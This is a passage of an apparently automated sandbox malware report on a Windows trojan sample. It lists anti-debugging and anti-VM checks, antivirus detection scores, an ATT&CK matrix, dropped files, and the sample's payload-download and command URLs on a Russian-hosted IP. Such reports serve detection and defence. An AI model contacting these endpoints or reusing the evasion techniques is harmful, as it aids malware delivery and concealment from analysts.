Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: dI3n4LSHB7.exe, 00000000.00000002.2420658294.00000000009A4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile opened: NTICE
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile opened: SICE
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0081C98C rdtsc 0_2_0081C98C
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04D02A6F mov eax, dword ptr fs:[00000030h]0_3_04D02A6F
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04CFE30D mov eax, dword ptr fs:[00000030h]0_3_04CFE30D
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]0_2_0041366F
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]0_2_0040EF0D
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00D79C9B push dword ptr fs:[00000030h]0_2_00D79C9B
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B40D90 mov eax, dword ptr fs:[00000030h]0_2_04B40D90
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B538D6 mov eax, dword ptr fs:[00000030h]0_2_04B538D6
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4092B mov eax, dword ptr fs:[00000030h]0_2_04B4092B
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4F174 mov eax, dword ptr fs:[00000030h]0_2_04B4F174
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C70
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00409949 SetUnhandledExceptionFilter,0_2_00409949
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408ED5
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004097B2
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B4913C
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B49A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B49A19
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B49BB0 SetUnhandledExceptionFilter,0_2_04B49BB0
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B4C31A
Source: dI3n4LSHB7.exe, dI3n4LSHB7.exe, 00000000.00000002.2420658294.00000000009A4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ;Program Manager
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04CF8DB3 cpuid 0_3_04CF8DB3
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter
1
DLL Side-Loading
2
Process Injection
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
24
Virtualization/Sandbox Evasion
LSASS Memory781
Security Software Discovery
Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection
Security Account Manager24
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS3
Process Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
Software Packing
Cached Domain Credentials223
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
dI3n4LSHB7.exe57%VirustotalBrowse
dI3n4LSHB7.exe63%ReversingLabsWin32.Trojan.Amadey
dI3n4LSHB7.exe100%AviraHEUR/AGEN.1320706
dI3n4LSHB7.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://185.156.73.23/soft/downloadfalse
    unknown
    http://185.156.73.23/add?substr=mixtwo&s=three&sub=empfalse
      unknown
      http://185.156.73.23/dll/downloadfalse
        unknown
        http://185.156.73.23/files/downloadfalse
          unknown
          http://185.156.73.23/dll/keyfalse
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://185.156.7dI3n4LSHB7.exe, 00000000.00000003.2164899084.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143225056.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              http://185.156.73.23/files/downldI3n4LSHB7.exe, 00000000.00000003.2164899084.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143225056.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://185.156.73.23/files/download23/files/downloadftdI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://185.156.73.23/files/downloadLMEMdI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://185.156.73.23/files/downloadXdI3n4LSHB7.exe, 00000000.00000003.2004022772.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978855057.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://upx.sf.netAmcache.hve.7.drfalse
                        high
                        http://185.156.73.23/dll/key5dI3n4LSHB7.exe, 00000000.00000002.2423473843.0000000005461000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174dI3n4LSHB7.exe, 00000000.00000003.2143147652.0000000005529000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143116370.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144119013.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000590F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144925327.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2145027376.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2146009236.000000000594F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                            high
                            http://185.156.73.23/add?substr=mixtwo&s=three&sub=emphdI3n4LSHB7.exe, 00000000.00000003.1850067777.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000002.2423473843.0000000005461000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1824890347.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=empdI3n4LSHB7.exe, 00000000.00000003.1850067777.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1824890347.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://185.156.73.23/files/downloadddI3n4LSHB7.exe, 00000000.00000003.2164899084.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143225056.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://185.156.73.23/files/downlidI3n4LSHB7.exe, 00000000.00000003.2164899084.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143225056.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://185.156.73.23/files/download23/files/downloaddI3n4LSHB7.exe, 00000000.00000003.1850067777.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://185.156.73.23/files/downloadjdI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://185.156.73.23/files/downloadwo&s=three&sub=empdI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://g-cleanit.hkdI3n4LSHB7.exe, 00000000.00000003.2143147652.0000000005529000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143116370.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144119013.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000590F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144925327.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2145027376.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2146009236.000000000594F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                                            high
                                            http://185.156.73.23/files/download6dI3n4LSHB7.exe, 00000000.00000003.2004022772.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875426608.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927026638.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978855057.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953566017.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1849981502.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901433498.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://185.156.73.23/files/download=%dI3n4LSHB7.exe, 00000000.00000002.2421379275.0000000000E17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://185.156.73dI3n4LSHB7.exe, 00000000.00000003.2164899084.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143225056.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://185.156.73.23/files/downloadftdI3n4LSHB7.exe, 00000000.00000003.1850067777.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://iplogger.org/1Pz8p7dI3n4LSHB7.exe, 00000000.00000003.2143147652.0000000005529000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143116370.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144119013.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000590F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144925327.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2145027376.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2146009236.000000000594F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                                                      high
                                                      http://185.156.73.23/files/download23/files/downloadwo&s=three&sub=empdI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://185.156.73.23/files/downloadFdI3n4LSHB7.exe, 00000000.00000003.2004022772.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927026638.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978855057.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953566017.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          185.156.73.23
                                                          unknownRussian Federation
                                                          48817RELDAS-NETRUfalse
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1578903
                                                          Start date and time:2024-12-20 16:26:41 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 39s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:9
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:dI3n4LSHB7.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:2725f2b0ffa89f08642d36caf06c3ce4.exe
                                                          Detection:MAL
                                                          Classification:mal100.evad.winEXE@2/15@0/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 52.168.117.173, 4.245.163.56, 173.222.162.32, 20.190.160.17, 13.107.246.63
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          TimeTypeDescription
                                                          10:28:05API Interceptor88x Sleep call for process: dI3n4LSHB7.exe modified
                                                          10:28:46API Interceptor1x Sleep call for process: WerFault.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          185.156.73.23zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                                                          • 185.156.73.23/soft/download
